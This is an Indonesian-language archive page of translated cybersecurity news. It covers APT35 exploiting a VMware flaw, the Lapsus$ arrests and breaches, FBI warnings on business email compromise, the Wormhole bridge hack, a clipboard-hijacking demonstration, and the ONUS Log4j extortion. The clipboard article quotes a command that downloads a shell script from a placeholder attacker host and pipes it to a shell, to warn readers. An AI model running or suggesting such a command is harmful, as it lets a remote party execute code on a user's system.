Peretasan

Peretas mengeksploitasi kelemahan penting VMware RCE untuk memasang pintu belakang

April 27, 2022 by Eevee

Peretas tingkat lanjut secara aktif mengeksploitasi kerentanan eksekusi kode jarak jauh (RCE), CVE-2022-22954, yang memengaruhi VMware Workspace ONE Access (sebelumnya disebut VMware Identity Manager).

Masalah ini telah diatasi dalam pembaruan keamanan 20 hari yang lalu bersama dengan dua RCE lainnya – CVE-2022-22957 dan CVE-2022-22958 yang juga memengaruhi VMware Identity Manager (vIDM), VMware vRealize Automation (vRA), VMware Cloud Foundation, dan vRealize Suite Lifecycle Manager.

Segera setelah pengungkapan kelemahan tersebut kepada publik, kode eksploitasi bukti konsep (PoC) muncul di ruang publik, memungkinkan peretas memanfaatkan untuk menargetkan penyebaran produk VMware yang rentan. VMware mengkonfirmasi eksploitasi CVE-2022-22954 di alam liar.

Sekarang, para peneliti di Morphisec melaporkan melihat eksploitasi dari aktor ancaman persisten tingkat lanjut (APT), khususnya kelompok peretasan Iran yang dilacak sebagai APT35, alias “Rocket Kitten.”

Musuh mendapatkan akses awal ke lingkungan dengan mengeksploitasi CVE-2022-22954, satu-satunya di trio RCE yang tidak memerlukan akses administratif ke server target dan juga memiliki eksploitasi PoC yang tersedia untuk umum.

Serangan dimulai dengan mengeksekusi perintah PowerShell pada layanan yang rentan (Identity Manager), yang meluncurkan stager.

Stager kemudian mengambil pemuat PowerTrash dari server perintah dan kontrol (C2) dalam bentuk yang sangat dikaburkan dan memuat agen Dampak Inti ke dalam memori sistem.

Core Impact adalah alat pengujian penetrasi yang sah yang disalahgunakan untuk tujuan jahat dalam kasus ini, mirip dengan bagaimana Cobalt Strike digunakan dalam kampanye jahat.

“Penelitian Morphisec mengamati penyerang yang sudah mengeksploitasi kerentanan ini (CVE-2022-22954) untuk meluncurkan backdoor HTTPS terbalik—terutama Cobalt Strike, Metasploit, atau Core Impact beacon” – Morphisec

CTO Morphisec Michael Gorelik mengatakan bahwa penyerang mencoba gerakan lateral pada jaringan, meskipun pintu belakang dihentikan.

Morphisec dapat mengambil alamat C2 server stager, versi klien Core Impact, dan kunci enkripsi 256-bit yang digunakan untuk komunikasi C2, dan akhirnya menghubungkan operasi tersebut dengan orang tertentu bernama Ivan Neculiti dan sebuah perusahaan bernama Stark Industries.

Beberapa perusahaan dalam database paparan penipuan yang mencantumkan nama Neculiti sebagai rekanan atau penerima manfaat. Basis data tersebut mencakup perusahaan hosting yang diduga mendukung situs web ilegal yang digunakan dalam kampanye spam dan phishing.

Pembaruan [26 April, 12:04]: BleepingComputer menerima pernyataan dari P.Q. Hosting S.R.L., yang berkantor pusat di Moldova dan perusahaan induk Stark Industries, menolak keterlibatan mereka yang disengaja dalam kegiatan ilegal:

Sumber: Bleeping Computer

Tujuh remaja ditangkap sehubungan dengan kelompok peretasan Lapsus$

March 25, 2022 by Eevee

Polisi Kota London telah menangkap tujuh remaja karena dicurigai memiliki hubungan dengan kelompok peretas yang diyakini sebagai kelompok Lapsus$ yang baru-baru ini berkembang biak, lapor BBC News.

“Kepolisian Kota London telah melakukan penyelidikan dengan mitranya terhadap anggota kelompok peretasan,” kata Inspektur Detektif Michael O’Sullivan dari Kepolisian Kota London dalam sebuah pernyataan kepada The Verge. “Tujuh orang berusia antara 16 dan 21 telah ditangkap sehubungan dengan penyelidikan ini dan semuanya telah dibebaskan untuk diselidiki. Penyelidikan kami tetap berlangsung.”

Lapsus$ telah bertanggung jawab atas beberapa pelanggaran keamanan besar di perusahaan teknologi, termasuk Nvidia, Samsung, Ubisoft, Okta, dan Microsoft. Pada hari Rabu, muncul laporan yang menunjukkan seorang remaja yang berbasis di Oxford adalah dalang dari kelompok tersebut. Polisi Kota London tidak mengatakan apakah remaja ini termasuk di antara mereka yang ditangkap.

Setidaknya satu anggota Lapsus$ juga tampaknya terlibat dengan pelanggaran data di EA, pakar keamanan siber Brian Krebs melaporkan pada hari Rabu dalam sebuah artikel ekstensif tentang grup tersebut. Vice menguatkan keterlibatan kelompok dalam pelanggaran itu dalam artikelnya sendiri pada hari Kamis, mencatat bahwa itu adalah “lambang dari peretasan Lapsus$ berikutnya dan besar-besaran.”

Identitas tersangka dalang itu rupanya terungkap oleh pelanggan yang marah dan memarahinya. Menurut laporan Krebs, pemimpin kelompok tersebut membeli Doxbin, sebuah situs di mana orang dapat berbagi atau menemukan informasi pribadi tentang orang lain, tahun lalu, tetapi pemilik situs tersebut adalah pemilik yang buruk. Dia tampaknya menyerahkan kendali pada Januari tetapi membocorkan “seluruh kumpulan data Doxbin” ke Telegram, dan komunitas Doxbin membalas dengan membocorkannya.

BBC News mengatakan telah berbicara dengan ayah remaja itu, yang tampaknya tidak menyadari keterlibatannya dengan kelompok itu.

“Saya belum pernah mendengar tentang semua ini sampai baru-baru ini. Dia tidak pernah berbicara tentang peretasan apa pun, tetapi dia sangat mahir menggunakan komputer dan menghabiskan banyak waktu di depan komputer,” kata sang ayah, menurut BBC News. “Saya selalu berpikir dia sedang bermain game. Kami akan mencoba menghentikannya menggunakan komputer.”

Sumber : The Verge

Microsoft Menyelidiki Klaim Pelanggaran oleh Geng Pemerasan

March 24, 2022 by Eevee

Microsoft sedang menyelidiki klaim bahwa kelompok peretasan yang berfokus pada pemerasan yang sebelumnya membahayakan perusahaan besar seperti Ubisoft dan Nvidia telah memperoleh akses ke sistem internal Microsoft, menurut sebuah pernyataan dari perusahaan.

Kelompok peretas, yang menggunakan nama sendiri LAPSUS$, telah berhasil menembus gelombang perusahaan baru-baru ini. LAPSUS$ terkadang membuat permintaan tebusan yang tidak biasa dari para korbannya, termasuk meminta Nvidia untuk membuka kunci aspek kartu grafisnya agar lebih cocok untuk menambang cryptocurrency. Kelompok tersebut sejauh ini tidak membuat tuntutan publik terhadap Microsoft.

Pada hari Minggu, LAPSUS$ memposting tangkapan layar yang tampaknya merupakan akun pengembang internal Microsoft ke saluran Telegram mereka. Tangkapan layar tampaknya berasal dari akun Azure DevOps, produk yang ditawarkan Microsoft yang memungkinkan pengembang berkolaborasi dalam proyek.

Proyek khusus yang ditampilkan di tangkapan layar termasuk “Bing_UX,” yang berpotensi merujuk pada pengalaman pengguna mesin pencari Bing Microsoft; “Bing-Source,” menunjukkan akses ke kode sumber mesin pencari; dan “Cortana,” asisten cerdas Microsoft. Bagian lain termasuk “mscomdev,” “microsoft,” dan “msblox,” menunjukkan siapa pun yang mengambil tangkapan layar mungkin memiliki akses ke repositori kode lain juga.

Apakah Anda tahu hal lain tentang pelanggaran ini atau yang lainnya? Kami akan senang mendengar dari Anda. Menggunakan telepon atau komputer non-kerja, Anda dapat menghubungi Joseph Cox dengan aman di Signal di +44 20 8133 5190, Wickr di josephcox, atau mengirim email ke joseph.cox@vice.com.

Tak lama setelah memposting tangkapan layar, administrator saluran Telegram LAPSUS$ menghapus gambar tersebut.

Awal bulan ini, grup tersebut mengatakan di saluran Telegramnya bahwa mereka sedang mencari karyawan di dalam perusahaan yang bersedia bekerja dengan mereka, termasuk Microsoft.

SCREENSHOT YANG DIUPLOAD OLEH LAPSUS$. GAMBAR: TELEGRAM.

Sejak Desember, kelompok tersebut telah melanggar Kementerian Kesehatan Brasil, sejumlah perusahaan Brasil dan Portugis, dan kemudian Nvidia dan Samsung masing-masing pada bulan Februari dan Maret, menurut garis waktu serangan LAPSUS yang diterbitkan oleh perusahaan keamanan siber Silent Push. Kelompok itu juga tampaknya mengambil pujian karena melanggar Ubisoft bulan ini.

Selama beberapa serangannya, kelompok tersebut meminta pembayaran sebagai imbalan untuk tidak membocorkan data internal yang telah dicuri dari para korban. Dalam kasus NVIDIA, para peretas menuntut agar perusahaan membuka sumber driver GPU-nya dan menghapus batasan pada kartu 30-seri di sekitar penambangan Ethereum, The Verge melaporkan pada saat itu. Di grup Telegramnya, LAPSUS$ juga mengklaim bahwa NVIDIA, atau seseorang yang bekerja atas namanya, meretas serangan dan mencoba mengenkripsi materi yang dicuri. Kelompok tersebut akhirnya membocorkan beberapa data NVIDIA serta data yang dicuri dari Samsung.

LAPSUS$ mungkin juga bertanggung jawab atas peretasan raksasa game Electronic Arts, meskipun peretas tidak menggunakan nama LUPSUS$ sampai setelah Motherboard mengungkapkan pelanggaran itu Juni lalu. Dalam posting selanjutnya di forum bawah tanah, seorang pengguna menulis “kredit sebenarnya adalah untuk LAPSUS$, kami akan membocorkan lebih banyak barang.”

Dalam email ke Motherboard, Stefano De Blasi, analis riset ancaman siber di perusahaan keamanan siber Digital Shadows, menunjukkan dua hal yang membuat LAPSUS$ berbeda dari geng pemerasan biasa. Pertama, kelompok tersebut tidak pernah benar-benar menyebarkan ransomware, melainkan mengekstrak data dan menggunakannya untuk memeras target. Ini memungkinkan grup untuk bergerak lebih diam-diam, kata De Blasi. De Blasi juga menunjuk pada kehadiran interaktif LAPSUS$ di Telegram, dan khususnya pesan grup dengan pengikutnya.

Sumber : Vice

FBI memperingatkan penyerang BEC yang menyamar sebagai CEO dalam pertemuan virtual

February 18, 2022 by Eevee

Biro Investigasi Federal (FBI) hari ini memperingatkan bahwa organisasi dan individu AS semakin menjadi sasaran dalam serangan BEC (kompromi email bisnis) pada platform pertemuan virtual.

Penipu BEC dikenal menggunakan berbagai taktik (termasuk rekayasa sosial, phishing, dan peretasan) untuk menyusupi akun email bisnis dengan tujuan akhir mengalihkan pembayaran ke rekening bank mereka sendiri.

Dalam jenis serangan ini, para penjahat menargetkan bisnis kecil, menengah, dan besar, serta individu. Tingkat keberhasilannya juga sangat tinggi karena penipu biasanya berpura-pura sebagai orang yang dipercaya oleh karyawan, seperti mitra bisnis atau CEO.

FBI mengatakan mereka melihat scammers beralih ke platform pertemuan virtual yang cocok dengan tren keseluruhan bisnis yang pindah ke pekerjaan jarak jauh selama pandemi.

Seperti yang dijelaskan dalam PSA FBI, para penjahat menggunakan platform kolaborasi tersebut dalam serangan mereka dengan berbagai cara, termasuk menyamar sebagai CEO dalam rapat virtual dan menyusup ke rapat untuk mengumpulkan informasi bisnis:

Mengganggu email majikan atau direktur keuangan, seperti CEO atau CFO, dan meminta karyawan untuk berpartisipasi dalam platform pertemuan virtual di mana penjahat akan menyisipkan gambar diam CEO tanpa audio, atau audio “deep fake1”, dan mengklaim mereka video/audio tidak berfungsi dengan baik. Mereka kemudian melanjutkan untuk menginstruksikan karyawan untuk melakukan transfer dana melalui obrolan platform pertemuan virtual atau dalam email tindak lanjut.
Mengkompromikan email karyawan untuk memasukkan diri mereka ke dalam rapat di tempat kerja melalui platform rapat virtual untuk mengumpulkan informasi tentang operasi bisnis sehari-hari.
Mengganggu email pemberi kerja, seperti CEO, dan mengirim email palsu kepada karyawan yang menginstruksikan mereka untuk melakukan transfer dana, karena CEO mengklaim sedang sibuk dalam rapat virtual dan tidak dapat melakukan transfer dana melalui komputer mereka sendiri.

Menurut laporan tahunan FBI tahun 2020 tentang kejahatan dunia maya, penipuan BEC adalah “bisnis” yang sangat menguntungkan, mengingat serangan BEC berada di balik rekor jumlah keluhan dan kerugian finansial sekitar $1,8 miliar.

Ini adalah bagian terbesar dari $ 4,2 miliar yang secara resmi hilang karena kejahatan dunia maya oleh orang Amerika pada tahun 2020.

Dari 791.790 pengaduan yang diterima oleh Pusat Pengaduan Kejahatan Internet (IC3) FBI, 19.369 pengaduan adalah tentang penipuan BEC atau kompromi akun email (EAC).

FBI juga memperingatkan perusahaan sektor swasta AS pada Maret 2021 tentang serangan BEC yang semakin menargetkan entitas pemerintah negara bagian, lokal, suku, dan teritorial (SLTT).

Dalam peringatan sebelumnya, FBI mengatakan penipu BEC menyalahgunakan layanan email cloud seperti Google G Suite dan Microsoft Office 365, serta penerusan otomatis email dalam serangan mereka.

Sumber : Bleeping Computer

Keamanan siber: Negara-negara ini adalah ancaman peretasan baru yang harus ditakuti saat kampanye ofensif meningkat

February 16, 2022 by Eevee

Jumlah operasi peretasan negara-bangsa yang bermusuhan meningkat karena negara-negara baru berinvestasi dalam kampanye penyusupan dunia maya dan kelompok penyerang yang didukung negara mengambil keuntungan dari peningkatan organisasi yang mengadopsi aplikasi cloud.

Laporan Ancaman Global 2022 Crowdstrike merinci bagaimana lanskap ancaman dunia maya telah berkembang selama setahun terakhir. Salah satu perkembangan itu adalah munculnya negara-negara baru yang terlibat dalam operasi siber ofensif, termasuk Turki dan Kolombia.

Serangan oleh kelompok terkait Turki dirinci sebagai serangan oleh ‘Serigala’ sementara serangan oleh operasi Kolombia telah Dijuluki ‘Ocelot’ dengan cara yang mirip dengan cara peneliti keamanan siber menyebut aktivitas yang didukung pemerintah Rusia ‘Beruang’ atau kelompok peretas Cina ‘Panda’.

Kegiatan oleh salah satu kelompok baru ini dirinci dalam laporan; kelompok peretasan yang berbasis di Turki, dijuluki Cosmic Wolf oleh para peneliti, menargetkan data korban yang tidak ditentukan yang disimpan dalam lingkungan cloud Amazon Web Services (AWS) pada April 2021.

Penyerang dapat membobol lingkungan cloud AWS menggunakan nama pengguna dan kata sandi yang dicuri, yang juga memberi penyerang hak istimewa yang diperlukan untuk mengubah baris perintah. Itu berarti mereka dapat mengubah pengaturan keamanan untuk mengizinkan akses langsung Secure Shell Protocol (SSH) ke AWS dari infrastruktur mereka sendiri, memungkinkan pencurian data.

Salah satu alasan negara meningkatkan kemampuan siber ofensif mereka adalah karena dampak pandemi global. Penguncian dan pemeriksaan perjalanan yang ketat mempersulit teknik spionase tradisional untuk menjadi efektif, yang mengarah pada investasi dalam operasi dunia maya.

Pergeseran menuju aplikasi cloud dan layanan cloud IT juga telah memainkan peran tanpa disadari dalam membuat serangan siber menjadi lebih mudah. Munculnya pekerjaan hibrida berarti banyak karyawan tidak berbasis di kantor, alih-alih terhubung dari jarak jauh melalui aplikasi kolaboratif, VPN, dan layanan lainnya menggunakan nama pengguna dan kata sandi.

Itu membuat menjadi produktif saat bekerja dari jarak jauh lebih mudah bagi karyawan tetapi juga membuat segalanya lebih sederhana untuk kelompok peretas, yang secara diam-diam dapat mengakses jaringan dengan nama pengguna dan kata sandi yang dicuri atau ditebak.

Beberapa insiden keamanan siber terbesar dalam beberapa tahun terakhir, seperti serangan SolarWinds dan Microsoft Exchange, telah menunjukkan bagaimana serangan yang menargetkan layanan cloud dan rantai pasokan cloud bisa menjadi kuat, terutama jika cloud salah dikonfigurasi atau dipantau dengan buruk.

Namun, ada langkah-langkah yang dapat diambil organisasi untuk membantu membuat jaringan dan infrastruktur cloud mereka lebih tahan terhadap serangan siber, termasuk penerapan strategi tanpa kepercayaan untuk tidak memercayai perangkat yang terhubung ke jaringan secara default.

Makalah penelitian juga merekomendasikan bahwa organisasi bekerja untuk menghilangkan kesalahan konfigurasi dalam aplikasi dan layanan cloud mereka dengan mengatur pola default untuk menyiapkan cloud, jadi ketika akun baru disiapkan, itu dilakukan dengan cara yang dapat diprediksi, meminimalkan kemungkinan kesalahan manusia tidak terdeteksi.

Sumber : ZDnet

Jembatan token Wormhole kehilangan $321 juta dalam peretasan terbesar sejauh ini pada tahun 2022

February 4, 2022 by Eevee

Jembatan token Wormhole mengalami eksploitasi keamanan pada hari Rabu, mengakibatkan hilangnya 120.000 token Wrapped Ether (wETH) ($321 juta) dari platform.

Wormhole adalah jembatan token yang memungkinkan pengguna untuk mengirim dan menerima kripto antara Ethereum, Solana, Binance Smart Chain (BSC), Polygon, Longsor, Oasis dan Terra tanpa menggunakan pertukaran terpusat.

Ini adalah peretasan crypto terbesar tahun 2022 sejauh ini dan peretasan keuangan terdesentralisasi terbesar kedua hingga saat ini. Tim Wormhole telah menawarkan hadiah bug senilai $10 juta untuk pengembalian dana tersebut.

Peretasan terjadi di sisi jembatan Solana, dan ada kekhawatiran bahwa jembatan Wormhole ke Terra juga rentan.

Peretasan terjadi pada pukul 18:24 UTC pada hari Rabu. Penyerang mencetak 120.000 wETH di Solana, kemudian menukarkan 93.750 weTH dengan ETH senilai $254 juta ke jaringan Ethereum pada pukul 18:28 UTC. Peretas telah menggunakan sejumlah dana untuk membeli SportX (SX), Meta Capital (MCAP), Akhirnya Dapat Digunakan Crypto Karma (FUCK) dan Bored Ape Yacht Club Token (APE).

Sisanya ditukar dengan Solana (SOL) dan USD Coin (USDC) di Solana. Dompet Solana peretas saat ini memegang 432.662 SOL ($44 juta).

Tim Wormhole menghubungi peretas melalui alamat Ethereum mereka, menawarkan untuk membiarkan peretas menyimpan dana senilai $10 juta yang dicuri jika sisa dana dikembalikan.

Pada saat penulisan, token WETH yang dikirim melintasi jembatan belum dapat ditukarkan, sementara tim Wormhole mencoba untuk memperbaiki eksploitasi.

Frekuensi peretasan kontrak pintar pada jembatan token berfungsi untuk memvalidasi peringatan 7 Januari Vitalik Buterin bahwa ada “batas keamanan mendasar jembatan.” Peringatan salah satu pendiri Ethereum berada dalam konteks serangan 51% terhadap Ethereum, tetapi sarannya tepat waktu ketika ia menunjukkan kerentanan umum yang tampak pada jembatan yang mengirim token melintasi blockchain layer-1.

Sumber : Coin Telegraph

Jangan salin tempel perintah dari halaman web — Anda bisa diretas

January 4, 2022 by Eevee

Baru-baru ini, Gabriel Friedlander, pendiri platform pelatihan kesadaran keamanan Wizer mendemonstrasikan peretasan yang jelas namun mengejutkan yang akan membuat Anda berhati-hati dalam menyalin-menempelkan perintah dari halaman web.

Friedlander memperingatkan sebuah halaman web dapat secara diam-diam mengganti konten dari apa yang ada di clipboard Anda, dan yang lebih buruk lagi pengembang mungkin hanya menyadari kesalahan mereka setelah menempelkan teks, dan pada saat itu mungkin sudah terlambat.

Dalam bukti konsep sederhana (PoC) yang diterbitkan di blognya, Friedlander meminta pembaca untuk menyalin perintah sederhana yang akan dikenal oleh sebagian besar sysadmin dan pengembang:

Halaman HTML Friedlander dengan perintah sederhana yang dapat Anda salin ke clipboard

Sekarang, tempelkan apa yang Anda salin dari blog Friedlander ke dalam kotak teks atau Notepad, dan hasilnya mungkin akan membuat Anda terkejut:

curl http://attacker-domain:8000/shell.sh | SH

Anda tidak hanya mendapatkan perintah yang sama sekali berbeda di clipboard Anda, tetapi untuk memperburuk keadaan, ia memiliki karakter baris baru (atau kembali) di akhir.

Mereka yang menempelkan teks mungkin mendapat kesan bahwa mereka menyalin perintah sudo apt update yang familier dan tidak berbahaya yang digunakan untuk mengambil informasi terbaru pada perangkat lunak yang diinstal pada sistem Anda.

Keajaibannya ada pada kode JavaScript yang tersembunyi di balik pengaturan halaman HTML PoC oleh Friedlander. Setelah Anda menyalin teks “sudo apt update” yang terdapat dalam elemen HTML, cuplikan kode, yang ditampilkan di bawah ini berjalan.

Apa yang terjadi setelahnya adalah ‘pendengar acara’ JavaScript yang menangkap peristiwa penyalinan dan mengganti data papan klip dengan kode uji berbahaya Friedlander:

Kode JavaScript PoC yang menggantikan konten clipboard

“Inilah mengapa Anda TIDAK PERNAH menyalin perintah tempel langsung ke terminal Anda,” Friedlander memperingatkan.

“Anda pikir Anda menyalin satu hal, tetapi itu diganti dengan sesuatu yang lain, seperti kode berbahaya. Yang diperlukan hanyalah satu baris kode yang disuntikkan ke dalam kode yang Anda salin untuk membuat pintu belakang ke aplikasi Anda.”

Seorang pengguna Reddit juga menyajikan contoh alternatif dari trik ini yang tidak memerlukan JavaScript: teks tak terlihat yang dibuat dengan gaya HTML dan CSS yang disalin ke clipboard Anda saat Anda menyalin bagian teks yang terlihat:

HTML yang tidak terlihat (kiri) diambil selama salin-tempel dan memiliki garis tambahan (kanan)

“Masalahnya bukan hanya situs web dapat mengubah konten clipboard Anda menggunakan JavaScript,” jelas pengguna, SwallowYourDreams.

“Bisa juga hanya menyembunyikan perintah dalam HTML yang tidak terlihat oleh mata manusia, tetapi akan disalin oleh komputer.”

Jadi, alasan lain untuk tidak pernah secara membabi buta mempercayai apa yang Anda salin dari halaman web—lebih baik tempel di editor teks terlebih dahulu.

Sumber : Bleeping Computer

Perusahaan Fintech yang terkena peretasan Log4j menolak untuk membayar uang tebusan $ 5 juta

December 30, 2021 by Eevee

Salah satu platform perdagangan crypto Vietnam terbesar, ONUS, baru-baru ini mengalami serangan cyber pada sistem pembayarannya yang menjalankan versi Log4j yang rentan.

Pelaku ancaman mendekati ONUS untuk memeras sejumlah $5 juta dan mengancam akan mempublikasikan data pelanggan jika ONUS menolak untuk mematuhinya. Setelah penolakan tersebut, pelaku memasang data hampir 2 juta pelanggan ONUS untuk dijual di forum.

Pada tanggal 9 Desember, eksploitasi PoC untuk kerentanan Log4Shell yang terkenal (CVE-2021-44228) bocor di GitHub. Dan, itu mendapat perhatian penyerang oportunistik yang mulai memindai internet secara massal untuk server yang rentan.

Antara 11 dan 13 Desember, pelaku ancaman berhasil mengeksploitasi kerentanan Log4Shell pada server Cyclos dari ONUS dan menanam pintu belakang untuk akses berkelanjutan.

Meskipun ONUS telah menambal instance Cyclos mereka, jendela eksposur memberikan waktu yang cukup bagi pelaku ancaman untuk mengekstrak database sensitif. Basis data ini berisi hampir 2 juta catatan pelanggan termasuk data E-KYC (Know Your Customer), informasi pribadi, dan kata sandi hash.

Alur kerja E-KYC yang digunakan oleh bank dan perusahaan FinTech biasanya melibatkan pengadaan beberapa bentuk dokumen identifikasi dan bukti dari pelanggan, bersama dengan ‘video selfie’ untuk verifikasi otomatis.

Menariknya, kerentanan Log4Shell ada di server kotak pasir yang digunakan “hanya untuk tujuan pemrograman” tetapi memungkinkan penyerang mengakses lebih lanjut ke lokasi penyimpanan data sensitif (ember Amazon S3) dengan data produksi, karena kesalahan konfigurasi sistem.

ONUS kemudian dilaporkan ditampar dengan permintaan pemerasan senilai $ 5 juta yang mereka tolak. Sebagai gantinya, perusahaan memilih untuk mengungkapkan serangan itu kepada pelanggan mereka melalui grup Facebook pribadi.

“Sebagai perusahaan yang mengutamakan keselamatan, kami berkomitmen untuk memberikan transparansi dan integritas kepada pelanggan kami dalam operasi bisnis,” kata CEO ONUS Chien Tran.

“Itulah sebabnya, setelah mempertimbangkan dengan cermat, hal yang benar yang perlu kita lakukan sekarang adalah memberi tahu seluruh komunitas ONUS tentang kejadian ini.”

Peretasan itu sendiri sedikit lebih dari sekadar masalah Log4j saja. Eksploitasi Log4j mungkin merupakan titik masuk bagi penyerang, tetapi kontrol akses yang tidak tepat pada bucket Amazon S3 ONUS memungkinkan penyerang mengakses secara tidak semestinya.

Pada 25 Desember, setelah gagal mengamankan jumlah pemerasan dari ONUS, pelaku ancaman memasang data pelanggan untuk dijual di pasar pelanggaran data,pelaku mengklaim memiliki salinan 395 tabel database ONUS dengan informasi pribadi pelanggan dan kata sandi hash yang mereka miliki.

Hampir 2 juta data pelanggan ONUS disiapkan untuk dijual di forum

Sampel juga termasuk gambar yang tidak diedit dari kartu ID pelanggan, paspor, dan klip video selfie yang dikirimkan pelanggan yang diperoleh selama proses KYC.

Rekomendasi CyStack untuk ONUS termasuk menambal kerentanan Log4Shell di Cyclos–seperti yang diinstruksikan oleh vendor, menonaktifkan kredensial AWS yang bocor, mengonfigurasi izin akses AWS dengan benar, memblokir akses publik ke semua bucket S3 yang sensitif, dan memberlakukan batasan tambahan.

Sekarang kerentanan log4j telah dieksploitasi oleh semua jenis pelaku ancaman dari peretas yang didukung negara hingga geng ransomware dan beberapa lainnya untuk menyuntikkan penambang kripto pada sistem yang rentan.

Geng ransomware Conti juga terlihat mengincar server VMWare vCenter yang rentan untuk dieksploitasi.

Pengguna Log4j harus segera meningkatkan ke versi terbaru 2.17.1 (untuk Java 8) yang dirilis kemarin. Versi yang di-backport 2.12.4 (Java 7) dan 2.3.2 (Java 6) yang berisi perbaikan diharapkan akan segera dirilis.

Selengkapnya : Bleeping Computer

Cookie	Duration	Description
_ga	2 years	The _ga cookie, installed by Google Analytics, calculates visitor, session and campaign data and also keeps track of site usage for the site's analytics report. The cookie stores information anonymously and assigns a randomly generated number to recognize unique visitors.
_gat_gtag_UA_172707709_1	1 minute	Set by Google to distinguish users.
_gid	1 day	Installed by Google Analytics, _gid cookie stores information on how visitors use a website, while also creating an analytics report of the website's performance. Some of the data that are collected include the number of visitors, their source, and the pages they visit anonymously.

Peretasan

Cookies Settings